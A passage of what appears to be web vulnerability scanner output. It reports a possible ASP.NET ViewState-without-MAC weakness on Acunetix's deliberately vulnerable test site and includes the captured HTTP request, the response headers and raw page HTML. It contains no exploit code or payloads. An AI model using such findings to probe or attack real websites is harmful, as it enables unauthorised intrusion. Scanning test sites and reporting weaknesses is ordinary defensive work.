GEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 17827Response body (17827 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next 